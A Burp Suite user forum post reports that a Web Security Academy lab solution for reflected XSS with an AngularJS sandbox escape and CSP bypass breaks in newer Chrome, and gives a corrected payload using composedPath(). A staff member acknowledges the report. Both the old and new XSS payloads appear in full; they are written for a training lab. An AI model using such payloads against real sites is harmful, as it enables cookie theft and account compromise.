Research Academy Daily Swig
My account Customers Account and subscription management About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Login to post

Wrong solution in WSA Expert lab XSS: Reflected XSS with AngularJS sandbox escape and CSP

Aetius | Last updated: Jan 19, 2023 09:42PM UTC

Hello, in the WSA Lab titled 'Reflected XSS with AngularJS sandbox escape and CSP', the solution section is wrong because it suggests this payload: location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; But as mentioned at the end of one of your publications (https://portswigger.net/research/angularjs-csp-bypass-in-56-characters) 'Since Chrome 109 the path property has been removed. The workaround is to use composedPath() instead.'. So the new solution is: location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; I tested both in my up-to-date Chrome browser and also in the lab: only the solution containing $event.composedPath() instead of $event.path works and validates the challenge so you should correct it in the writeup. Thank you for your amazing learning material!

Michelle, PortSwigger Agent | Last updated: Jan 20, 2023 02:46PM UTC

Thanks for getting in touch :) We'll pass this on to the team.

You need to Log in to post a reply. Or register here, for free.